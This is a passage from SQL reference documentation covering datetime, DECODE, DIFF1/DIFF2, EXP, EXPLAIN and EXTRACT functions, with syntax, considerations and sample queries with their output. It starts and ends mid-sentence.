or\r\nTIMESTAMP. DATE_TRUNC returns a value of type TIMESTAMP which has all\r\nfields of lesser precision than _text_ set to zero (or 1 in the case of\r\nmonths or days). See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_trunc]]\r\n=== Examples of DATE_TRUNC\r\n\r\n* This function returns the value of TIMESTAMP '2006-12-31 00:00:00'.\r\n+\r\n```\r\nDATE_TRUNC('day', TIMESTAMP '2006-12-31 11:59:59')\r\n```\r\n\r\n* This function returns the value of TIMESTAMP '2006-01-01 00:00:00'\r\n+\r\n```\r\nDATE_TRUNC('YEAR', TIMESTAMP '2006-12-31 11:59:59')\r\n```\r\n\r\n* This function returns the value of TIMESTAMP '2006-12-01 00:00:00'\r\n+\r\n```\r\nDATE_TRUNC('MONTH', DATE '2006-12-31')\r\n```\r\n\r\nRestrictions:\r\n\r\n* DATE_TRUNC( 'DECADE', …) cannot be used on years less than 10.\r\n* DATE_TRUNC( 'CENTURY', …) cannot be used on years less than 100.\r\n\r\n<<<\r\n[[day_function]]\r\n== DAY Function\r\n\r\nThe DAY function converts a DATE or TIMESTAMP expression into an INTEGER\r\nvalue in the range 1 through 31 that represents the corresponding day of\r\nthe month. The result returned by the DAY function is equal to the\r\nresult returned by the DAYOFMONTH function.\r\n\r\nDAY is a {project-name} SQL extension.\r\n\r\n```\r\nDAY (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. 
See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_day]]\r\n=== Examples of Day\r\n\r\n* Return an integer that represents the day of the month from the\r\nstart date column of the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAY(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 10\r\n```\r\n\r\n<<<\r\n[[dayname_function]]\r\n== DAYNAME Function\r\n\r\nThe DAYNAME function converts a DATE or TIMESTAMP expression into a\r\ncharacter literal that is the name of the day of the week (Sunday,\r\nMonday, and so on).\r\n\r\nDAYNAME is a {project-name} SQL extension.\r\n\r\n```\r\nDAYNAME (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_dayname]]\r\n=== Considerations for DAYNAME\r\n\r\nThe DAYNAME function returns the name of the day in ISO8859-1.\r\n\r\n[[examples_of_dayname]]\r\n=== Examples of DAYNAME\r\n\r\nReturn the name of the day of the week from the start date column in the\r\nproject table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYNAME(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ---------\r\n2008-04-10 2008-04-21 08:15:00.000000 Thursday\r\n```\r\n\r\n<<<\r\n[[dayofmonth_function]]\r\n== DAYOFMONTH Function\r\n\r\nThe DAYOFMONTH function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 31 that represents the\r\ncorresponding day of the month. The result returned by the DAYOFMONTH\r\nfunction is equal to the result returned by the DAY function.\r\n\r\nDAYOFMONTH is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFMONTH (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_dayofmonth]]\r\n=== Examples of DAYOFMONTH\r\n\r\n* Return an integer that represents the day of the month from the\r\nstart date column of the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFMONTH(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 10\r\n```\r\n\r\n<<<\r\n[[dayofweek_function]]\r\n== DAYOFWEEK Function\r\n\r\nThe DAYOFWEEK function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 7 that represents the corresponding\r\nday of the week. The value 1 represents Sunday, 2 represents Monday, and\r\nso forth.\r\n\r\nDAYOFWEEK is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFWEEK (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. 
See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_dayofweek]]\r\n=== Examples of DAYOFWEEK\r\n\r\n* Return an integer that represents the day of the week from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFWEEK(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 5\r\n```\r\n+\r\nThe value returned is 5, representing Thursday. The week begins on Sunday.\r\n\r\n<<<\r\n[[dayofyear_function]]\r\n== DAYOFYEAR Function\r\n\r\nThe DAYOFYEAR function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 366 that represents the\r\ncorresponding day of the year.\r\n\r\nDAYOFYEAR is a {project-name} SQL extension.\r\n\r\n```\r\nDAYOFYEAR (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_dayofyear]]\r\n=== Examples of DAYOFYEAR\r\n\r\n* Return an integer that represents the day of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, DAYOFYEAR(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- --------------------\r\n2008-04-10 2008-04-21 08:15:00.000000 |101\r\n```\r\n\r\n<<<\r\n[[Decode_function]]\r\n== DECODE Function\r\n\r\nThe DECODE function compares _expr_ to each _test_expr_ value one by one\r\nin the order provided. If _expr_ is equal to a _test_expr_, then the\r\ncorresponding _retval_ is returned. If no match is found, _default_ is\r\nreturned. If no match is found and _default_ is omitted, NULL is\r\nreturned.\r\n\r\nDECODE is a {project-name} SQL extension.\r\n\r\n```\r\nDECODE (expr, test-expr, retval [, test-expr2, retval2 ... ] [ , default ] )\r\n```\r\n\r\n* `_expr_`\r\n+\r\nis an SQL expression.\r\n\r\n* `_test-expr_, _test-expr_, …`\r\n+\r\nare each an SQL expression of a type comparable to that of _expr_.\r\n\r\n* `_retval_`\r\n+\r\nis an SQL expression.\r\n\r\n* `_default_, _retval2_, …`\r\n+\r\nare each an SQL expression of a type comparable to that of _retval_.\r\n\r\n[[considerations_for_decode]]\r\n=== Considerations for DECODE\r\n\r\nIn a DECODE function, two nulls are considered to be equivalent. If\r\n_expr_ is null, then the returned value is the _retval_ of the first\r\n_test-expr_ that is also null.\r\n\r\nThe _expr_, _test-expr_, _retval_, and _default_ values can be\r\nderived from expressions.\r\n\r\nThe arguments can be any of the numeric types or character types.\r\nHowever, _expr_ and each _test-expr_ value must be of comparable types.\r\nIf _expr_ and _test-expr_ values are character types, they must be in\r\nthe same character set (to be comparable types.)\r\n\r\nAll the _retval_ values and the _default_ value, if any, must be of\r\ncomparable types.\r\n\r\nIf _expr_ and a _test-expr_ value are character data, the comparison is\r\nmade using non-padded comparison semantics.\r\n\r\nIf _expr_ and a _test-expr_ value are numeric data, the comparison is\r\nmade with a temporary copy of one of the numbers, according to defined\r\nrules of conversion. 
For example, if one number is INTEGER and the other\r\nis DECIMAL, the comparison is made with a temporary copy of the integer\r\nconverted to a decimal.\r\n\r\nIf all the possible return values are of fixed-length character types,\r\nthe returned value is a fixed-length character string with size equal to\r\nthe maximum size of all the possible return value types.\r\n\r\nIf any of the possible return values is a variable-length character\r\ntype, the returned value is a variable-length character string with\r\nmaximum size of all the possible return value types.\r\n\r\nIf all the possible return values are of integer types, the returned\r\nvalue is the same type as the largest integer type of all the possible\r\nreturn values.\r\n\r\nIf the returned value is of type FLOAT, the precision is the maximum\r\nprecision of all the possible return values.\r\n\r\nIf all the possible returned values are of the same non-integer, numeric\r\ntype (REAL, FLOAT, DOUBLE PRECISION, NUMERIC, or DECIMAL), the returned\r\nvalue is of that same type.\r\n\r\nIf all the possible return values are of numeric types but not all the\r\nsame, and at least one is REAL, FLOAT, or DOUBLE PRECISION, then the\r\nreturned value is of type DOUBLE PRECISION.\r\n\r\nIf all the possible return values are of numeric types but not all the\r\nsame, none are REAL, FLOAT, or DOUBLE PRECISION, and at least one is of\r\ntype NUMERIC, then the returned value is of type NUMERIC.\r\n\r\nIf all the possible return values are of numeric types, none are\r\nNUMERIC, REAL, FLOAT, or DOUBLE PRECISION, and at least one is of type\r\nDECIMAL, then the returned value will be of type DECIMAL.\r\n\r\nIf the returned value is of type NUMERIC or DECIMAL, it has a precision\r\nequal to the sum of:\r\n\r\n* The maximum scale of all the possible return value types and\r\n* The maximum value of (precision - scale) for all the possible return value types.\r\nHowever, the precision will not exceed 18.\r\n\r\nThe scale of the returned value is the minimum of:\r\n\r\n* The maximum scale of all the possible return value types and\r\n* 18 - (the maximum value of (precision - scale) for all the possible\r\nreturn value types).\r\n\r\nThe number of components in the DECODE function, including _expr_,\r\n_test-exprs_, _retvals_, and _default_, has no limit other than\r\nthe general limit of how big an SQL expression can be. However, large\r\nlists do not perform well.\r\n\r\nThe syntax\r\n\r\n```\r\nDECODE (expr, test_expr, retval [, test_expr2, retval2 ... 
] [, default ] ):\r\n```\r\n\r\nis logically equivalent to the following:\r\n\r\n```\r\nCASE\r\n WHEN (expr IS NULL AND test-expr IS NULL) OR expr = test-expr THEN retval\r\n WHEN (expr IS NULL AND test-expr2 IS NULL) OR expr = test_expr2 THEN retval2\r\n ...\r\n ELSE default \/* or ELSE NULL if _default_ not specified *\/\r\nEND\r\n```\r\n\r\nNo special conversion of _expr_, _test-exprN_, or _retvalN_ exist\r\nother than what a CASE statement normally does.\r\n\r\n[[examples_of_decode]]\r\n<<<\r\n=== Examples of DECODE\r\n\r\n* Example of the DECODE function:\r\n+\r\n```\r\nSELECT\r\n emp_name\r\n, DECODE( CAST (( yrs_of_service + 3) \/ 4 AS INT )\r\n , 0,0.04\r\n , 1,0.04\r\n , 0.06\r\n ) as perc_value\r\nFROM employees;\r\n\r\nSELECT\r\n supplier_name\r\n, DECODE( supplier_id\r\n , 10000\r\n , 'Company A'\r\n , 10001\r\n , 'Company B'\r\n , 10002\r\n , 'Company C'\r\n , 'Company D'\r\n ) as result\r\nFROM suppliers;\r\n```\r\n\r\n* This example shows a different way of handling NULL specified as\r\ndefault and not specified as default explicitly:\r\n+\r\n```\r\nSELECT DECODE( (?p1 || ?p2), trim(?p1), 'Hi', ?p3, null ) from emp;\r\n..\r\n*** ERROR[4049] A CASE expression cannot have a result data type of both CHAR(2) and NUMERIC(18,6).\r\n*** ERROR[4062] The preceding error actually occurred in function DECODE((?P1 || ?P2),(' ' TRIM ?P1), 'Hi', ?P3, NULL)\r\n*** ERROR[8822] The statement was not prepared.\r\n```\r\n+\r\nThe last _ret-val_ is an explicit NULL. When {project-name} SQL encounters\r\nthis situation, it assumes that the return value will be NUMERIC(18,6).\r\nOnce {project-name} SQL determines that the return values are numeric, it\r\ndetermines that all possible return values must be numeric. When 'Hi' is\r\nencountered in a _ret-val_ position, the error is produced because the\r\nCHAR(2) type argument is not comparable with a NUMERIC(18,6) type return\r\nvalue.\r\n+\r\nThis statement is equivalent and will not produce an error:\r\n+\r\n```\r\nSELECT DECODE( (?p1 || ?p2), trim(?p1), 'Hi' ) from emp;\r\n```\r\n\r\n<<<\r\n[[degrees_function]]\r\n== DEGREES Function\r\n\r\nThe DEGREES function converts a numeric value expression expressed in\r\nradians to the number of degrees.\r\n\r\nDEGREES is a {project-name} SQL extension.\r\n\r\n```\r\nDEGREES (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the DEGREES function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_degrees]]\r\n=== Examples of Degrees\r\n\r\n* This function returns the value 45.0001059971939008 in degrees:\r\n+\r\n```\r\nDEGREES(0.78540)\r\n```\r\n\r\n* This function returns the value of 45. The function degrees is the\r\ninverse of the function radians.\r\n+\r\n```\r\nDEGREES(RADIANS(45))\r\n```\r\n\r\n<<<\r\n[[diff1_function]]\r\n== DIFF1 Function\r\n\r\nThe DIFF1 function is a sequence function that calculates the amount of\r\nchange in an expression from row to row in an intermediate result table\r\nordered by a sequence by clause in a select statement.\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>>. \r\n\r\nDIFF1 is a {project-name} SQL extension.\r\n\r\n```\r\nDIFF1 (column-expression-a [,column-expression-b])\r\n```\r\n\r\n* `_column-expression-a_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. 
If you specify only one column as an argument, DIFF1 returns\r\nthe difference between the value of the column in the current row and\r\nits value in the previous row; this version calculates the unit change\r\nin the value from row to row.\r\n\r\n* `_column-expression-b_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify two columns as arguments, DIFF1 returns the\r\ndifference in consecutive values in _column-expression-a_ divided by\r\nthe difference in consecutive values in _column-expression-b_.\r\n\r\nThe purpose of the second argument is to distribute the amount of change\r\nfrom row to row evenly over some unit of change (usually time) in\r\nanother column.\r\n\r\n[[considerations_for_diff1]]\r\n=== Considerations for DIFF1\r\n\r\n[[equivalent-result]]\r\n==== Equivalent Result\r\n\r\nIf you specify one argument, the result of DIFF1 is equivalent to:\r\ncolumn-expression-a - OFFSET(column-expression-a, 1) If you specify two\r\narguments, the result of DIFF1 is equivalent to:\r\n\r\n```\r\nDIFF1(column-expression-a) \/ DIFF1(column-expression-b)\r\n```\r\n\r\nThe two-argument version involves division by the result of the DIFF1\r\nfunction. To avoid divide-by-zero errors, be sure that\r\n_column-expression-b_ does not contain any duplicate values whose DIFF1\r\ncomputation could result in a divisor of zero.\r\n\r\n[[datetime-arguments]]\r\n==== Datetime Arguments\r\n\r\nIn general, {project-name} SQL does not allow division by a value of INTERVAL\r\ndata type. However, to permit use of the two-argument version of DIFF1\r\nwith times and dates, {project-name} SQL relaxes this restriction and allows\r\ndivision by a value of INTERVAL data type.\r\n\r\n[[examples_of_diff1]]\r\n=== Examples of DIFF1\r\n\r\n* Retrieve the difference between the I1 column in the current row and\r\nthe I1 column in the previous row:\r\n+\r\n```\r\nSELECT DIFF1 (I1) AS DIFF1_I1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_I1\r\n------------\r\n ?\r\n 21959\r\n -9116\r\n -14461\r\n 7369\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe first row retrieved displays null because the offset from the\r\ncurrent row does not fall within the results set.\r\n\r\n* Retrieve the difference between the TS column in the current row and\r\nthe TS column in the previous row:\r\n+\r\n```\r\nSELECT DIFF1 (TS) AS DIFF1_TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_TS\r\n--------------------\r\n ?\r\n 30002620.000000\r\n 134157861.000000\r\n 168588029.000000\r\n 114055223.000000\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are expressed as the number of seconds. For example, the\r\ndifference between TIMESTAMP '1951-02-15 14:35:49' and TIMESTAMP\r\n'1950-03-05 08:32:09' is approximately 347 days. The difference between\r\nTIMESTAMP '1955-05-18 08:40:10' and TIMESTAMP '1951-02-15 14:35:49' is\r\napproximately 4 years and 3 months, and so on.\r\n\r\n<<<\r\n* This query retrieves the difference in consecutive values in I1\r\ndivided by the difference in consecutive values in TS:\r\n+\r\n```\r\nSELECT DIFF1 (I1,TS) AS DIFF1_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_I1TS\r\n-------------------\r\n ?\r\n .0007319\r\n -.0000679\r\n -.0000857\r\n .0000646\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are equivalent to the quotient of the results from the two\r\npreceding examples. 
For example, in the second row of the output of this\r\nexample, 0.0007319 is equal to 21959 divided by 30002620.\r\n\r\n\r\n<<<\r\n[[diff2_function]]\r\n== DIFF2 Function\r\n\r\nThe DIFF2 function is a sequence function that calculates the amount of\r\nchange in a DIFF1 value from row to row in an intermediate result table\r\nordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nDIFF2 is a {project-name} SQL extension.\r\n\r\n```\r\nDIFF2 (column-expression-a [,column-expression-b])\r\n```\r\n\r\n* `_column-expression-a_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify only one column as an argument, DIFF2 returns\r\nthe difference between the value of DIFF1(_column-expression-a_) in\r\nthe current row and the same result in the previous row.\r\n\r\n* `_column-expression-b_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify two columns as arguments, DIFF2 returns the\r\ndifference in consecutive values of DIFF1(_column-expression-a_)\r\ndivided by the difference in consecutive values in\r\n_column-expression-b_.\r\nSee <<diff1_function,DIFF1 Function>>.\r\n\r\n[[considerations_for_diff2]]\r\n=== Considerations for DIFF2\r\n\r\n[[equivalent_result_1]]\r\n==== Equivalent Result\r\n\r\n* If you specify one argument, the result of DIFF2 is equivalent to:\r\n+\r\n```\r\nDIFF1(column-expression-a)- OFFSET(DIFF1(column-expression-a),1)\r\n```\r\n\r\n* If you specify two arguments, the result of DIFF2 is equivalent to:\r\n+\r\n```\r\nDIFF2(column-expression-a) \/ DIFF1(column-expression-b)\r\n```\r\n\r\nThe two-argument version involves division by the result of the DIFF1\r\nfunction. To avoid divide-by-zero errors, be sure that\r\n_column-expression-b_ does not contain any duplicate values whose DIFF1\r\ncomputation could result in a divisor of zero.\r\n\r\n\r\n[[datetime_arguments]]\r\n==== Datetime Arguments\r\n\r\nIn general, {project-name} SQL does not allow division by a value of INTERVAL\r\ndata type. However, to permit use of the two-argument version of DIFF2\r\nwith times and dates, {project-name} SQL relaxes this restriction and allows\r\ndivision by a value of INTERVAL data type.\r\n\r\n[[examples_of_diff2]]\r\n=== Examples of DIFF2\r\n\r\n* Retrieve the difference between the value of DIFF1(I1) in the current\r\nrow and the same result in the previous row:\r\n+\r\n```\r\nSELECT DIFF2 (I1) AS DIFF2_I1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF2_I1\r\n--------------------\r\n ?\r\n ?\r\n -31075\r\n -5345\r\n 21830\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are equal to the difference of DIFF1(I1) for the current row\r\nand DIFF1(I1) of the previous row. For example, in the third row of the\r\noutput of this example, -31075 is equal to\r\n-91 6 minus 21959. 
The value -91 6 is the result of DIFF1(I1) for the\r\ncurrent row, and the\r\nvalue 21959 is the result of DIFF1(I1) for the previous row.\r\nSee <<examples_of_diff1,Examples of DIFF1>>.\r\n\r\n* Retrieve the difference in consecutive values of DIFF1(I1) divided by\r\nthe difference in consecutive values of TS:\r\n+\r\n```\r\nSELECT DIFF2 (I1,TS) AS DIFF2_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF2_I1TS\r\n---------------------\r\n ?\r\n ?\r\n -.000231\r\n -.000031\r\n .000191\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[exp_function]]\r\n== EXP Function\r\n\r\nThis function returns the exponential value (to the base e) of a numeric\r\nvalue expression. EXP is a {project-name} SQL extension.\r\n\r\n```\r\nEXP (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the EXP function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\nThe minimum input value must be between -744.4400719 and -744.4400720.\r\n\r\nThe maximum input value must be between 709.78271289338404 and\r\n709.78271289338405.\r\n\r\n[[examples_of_exp]]\r\n=== Examples of EXP\r\n\r\n* This function returns the value 3.49034295746184128E+000, or\r\napproximately 3.4903:\r\n+\r\n```\r\nEXP (1.25)\r\n```\r\n\r\n* This function returns the value 2.0. The function EXP is the inverse\r\nof the function LOG:\r\n+\r\n```\r\nEXP (LOG(2.0))\r\n```\r\n\r\n<<<\r\n[[explain_function]]\r\n== EXPLAIN Function\r\n\r\nThe EXPLAIN function is a table-valued stored function that generates a\r\nresult table describing an access plan for a SELECT, INSERT, DELETE, or\r\nUPDATE statement.\r\nSee <<result_of_the_explain_function,Result of the EXPLAIN Function>>.\r\n\r\nThe EXPLAIN function can be specified as a table reference (_table_)\r\nin the FROM clause of a SELECT statement if it is preceded by the\r\nkeyword TABLE and surrounded by parentheses.\r\n\r\nFor information on the EXPLAIN statement,\r\nsee <<explain_statement,EXPLAIN Statement>>.\r\n\r\n```\r\nEXPLAIN (module,'statement-pattern')\r\n```\r\n\r\n* `_module_ is:`\r\n+\r\n```\r\n'module-name' | NULL\r\n```\r\n\r\n* `'_module-name_'`\r\n+\r\nReserved for future use.\r\n\r\nThe module name is enclosed in single quotes and is case-sensitive. If a\r\nmodule name is uppercase, the value you specify within single quotes\r\nmust be uppercase. For example: 'MYCAT.MYSCH.MYPROG'\r\n\r\n* `NULL`\r\n+\r\nexplains statements prepared in the session. '_statement-pattern_'\r\n+\r\nA statement pattern is enclosed in single quotes and is case-sensitive.\r\nThe statement name must be in uppercase, unless you delimit the statement\r\nname in a PREPARE statement.\r\n\r\n[[considerations_for_explain_function]]\r\n=== Considerations for EXPLAIN Function\r\n\r\n\r\n[[using_a_statement_pattern]]\r\n==== Using a Statement Pattern\r\n\r\nUsing a statement pattern is analogous to using a LIKE pattern. 
You can\r\nuse the LIKE pattern in the following ways:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN(NULL,'S%'));\r\nSELECT * FROM table (EXPLAIN(NULL,'S1'));\r\nSELECT * FROM table (EXPLAIN(NULL,'%1'));\r\n```\r\n\r\nHowever, you cannot use the LIKE pattern in this way:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN (NULL, '%'))\r\n```\r\n\r\nThis statement returns the EXPLAIN result for all prepared statements\r\nwhose names begin with the uppercase letter 'S':\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN (NULL,'S%'))\r\n```\r\n\r\nIf the statement pattern does not find any matching statement names, no\r\nrows are returned as the result of the SELECT statement.\r\n\r\n\r\n[[obtaining_an_explain_plan_while_queries_are_running]]\r\n==== Obtaining an EXPLAIN Plan While Queries Are Running\r\n\r\n{project-name} SQL provides the ability to capture an EXPLAIN plan for a\r\nquery at any time while the query is running with the QID option. By\r\ndefault, this behavior is disabled for a {project-name} session.\r\n\r\nNOTE: Enable this feature before you start preparing and executing\r\nqueries.\r\n\r\nAfter this feature is enabled, use the following syntax in an EXPLAIN\r\nfunction to get the query execution plan of a running query:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN(NULL, 'QID=_qid_'))\r\n```\r\n\r\n* `_qid_` is a case-sensitive identifier, which represents the query ID. For\r\nexample:\r\n+\r\n```\r\n'QID=MXID01001011194212103659400053369000000085905admin00_2605_S1'\r\n```\r\n\r\nThe EXPLAIN function or statement returns the plan that was generated\r\nwhen the query was prepared. EXPLAIN for QID retrieves all the\r\ninformation from the original plan of the executing query. The plan is\r\navailable until the query finishes executing and is removed or\r\ndeallocated.\r\n\r\n<<<\r\n[[result_of_the_explain_function]]\r\n==== Result of the EXPLAIN Function\r\n\r\nThe result table of the EXPLAIN function describes the access plans for\r\nSELECT, INSERT, DELETE, or UPDATE statements.\r\n\r\nIn this description of the result of the EXPLAIN function, an operator\r\ntree is a structure that represents operators used in an access plan as\r\nnodes, with at most one parent node for each node in the tree, and with\r\nonly one root node.\r\n\r\nA node of an operator tree is a point in the tree that represents an\r\nevent (involving an operator) in a plan. Each node might have\r\nsubordinate nodes — that is, each event might generate a subordinate event\r\nor events in the plan.\r\n\r\n[cols=\"30%l,30%l,40%\",options=\"header\"]\r\n|===\r\n| Column Name | Data Type | Description\r\n| MODULE_NAME | CHAR(60) | Reserved for future use.\r\n| STATEMENT_ NAME | CHAR(60) | Statement name; truncated on the right if longer than 60 characters.\r\n| PLAN_ID | LARGEINT | Unique system-generated plan ID automatically assigned by {project-name} SQL;\r\ngenerated at compile time.\r\n| SEQ_NUM | INT | Sequence number of the current operator in the operator tree; indicates\r\nthe sequence in which the operator tree is generated.\r\n| OPERATOR | CHAR(30) | Current operator type.\r\n| LEFT_CHILD_ SEQ_NUM | INT | Sequence number for the first child operator of the current operator;\r\nnull if node has no child operators.\r\n| RIGHT_CHILD_ SEQ_NUM | INT | Sequence number for the second child operator of the current operator;\r\nnull if node does not have a second child.\r\n| TNAME | CHAR(60) | For operators in scan group, full name of base table, truncated on the\r\nright if too long for column. 
If correlation name differs from table\r\nname, simple correlation name first and then table name in parentheses.\r\n| CARDINALITY | REAL | Estimated number of rows that will be returned by the current operator.\r\nCardinality appears as ROWS\/REQUEST in some forms of EXPLAIN output. For\r\nthe right child of a nested join, multiply the cardinality by the number\r\nof requests to get the total number of rows produced by this operator.\r\n| OPERATOR_COST | REAL | Estimated cost associated with the current operator to execute the\r\noperator.\r\n| TOTAL_COST | REAL | Estimated cost associated with the current operator to execute the\r\noperator, including the cost of all subtrees in the operator tree.\r\n| DETAIL_COST | VARCHAR (200) | Cost vector of five items, described in the next table.\r\n| DESCRIPTION | VARCHAR (3000) | Additional information about the operator.\r\n|===\r\n\r\nThe DETAIL_COST column of the EXPLAIN function results contains these\r\ncost factors:\r\n\r\n[cols=\"20%l,80%\"]\r\n|===\r\n| CPU_TIME | An estimate of the number of seconds of processor time it might take to\r\nexecute the instructions for this operator. A value of 1.0 is 1 second.\r\n| IO_TIME | An estimate of the number of seconds of I\/O time (seeks plus data\r\ntransfer) to perform the I\/O for this operator.\r\n| MSG_TIME | An estimate of the number of seconds it takes for the messaging for this\r\noperator. The estimate includes the time for the number of local and\r\nremote messages and the amount of data sent.\r\n| IDLETIME | An estimate of the number of seconds to wait for an event to happen. The\r\nestimate includes the amount of time to open a table or start an ESP\r\nprocess.\r\n| PROBES | The number of times the operator will be executed. Usually, this value\r\nis 1, but it can be greater when you have, for example, an inner scan of\r\na nested-loop join.\r\n|===\r\n\r\n[[examples_of_explain_function]]\r\n=== Examples of EXPLAIN Function\r\n\r\n* Display the specified columns in the result table of the EXPLAIN\r\nfunction for the prepared statement REGION:\r\n+\r\n```\r\n>>SELECT seq_num, operator, operator_cost FROM table (EXPLAIN (null, 'REG'));\r\n\r\nSEQ_NUM OPERATOR OPERATOR_COST\r\n----------- ------------------------------ ---------------\r\n 1 TRAFODION_SCAN 0.43691027\r\n 2 ROOT 0.0\r\n\r\n--- 2 row(s) selected.\r\n\r\n>>log;\r\n```\r\n+\r\nThe example displays only part of the result table of the EXPLAIN\r\nfunction. It first uses the EXPLAIN function to generate the table and\r\nthen selects the desired columns.\r\n\r\n<<<\r\n[[extract_function]]\r\n== EXTRACT Function\r\n\r\nThe EXTRACT function extracts a datetime field from a datetime or\r\ninterval value expression. 
It returns an exact numeric value.\r\n\r\n```\r\nEXTRACT (datetime-field FROM extract-source)\r\n```\r\n\r\n* `_datetime-field_` is:\r\n+\r\nYEAR \\| MONTH \\| DAY \\| HOUR \\| MINUTE \\| SECOND\r\n\r\n* `_extract-source_` is:\r\n+\r\ndatetime-expression \\| interval-expression\r\n\r\nSee <<datetime_value_expressions,Datetime Value Expressions>> and\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n[[examples_of_extract]]\r\n=== Examples of EXTRACT\r\n\r\n* Extract the year from a DATE value:\r\n+\r\n```\r\nEXTRACT (YEAR FROM DATE '2007-09-28')\r\n```\r\n+\r\nThe result is 2007.\r\n\r\n* Extract the year from an INTERVAL value:\r\n+\r\n```\r\nEXTRACT (YEAR FROM INTERVAL '01-09' YEAR TO MONTH)\r\n```\r\n+\r\nThe result is 1.\r\n\r\n\r\n<<<\r\n[[hour_function]]\r\n=== HOUR Function\r\n\r\nThe HOUR function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value in the range 0 through 23 that represents the\r\ncorresponding hour of the day.\r\n\r\nHOUR is a {project-name} SQL extension.\r\n\r\n```\r\nHOUR (datetime-expression)\r\n```\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_hour]]\r\n=== Examples of HOUR\r\n\r\n* Return an integer that represents the hour of the day from the\r\nship timestamp column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, HOUR(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2007-04-10 2007-04-21 08:15:00.000000 8\r\n```\r\n\r\n<<<\r\n[[insert_function]]\r\n== INSERT Function\r\n\r\nThe INSERT function returns a character string where a specified number\r\nof characters within the character string has been deleted, beginning at\r\na specified start position, and where another character string has been\r\ninserted at the start position. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nINSERT is a {project-name} SQL 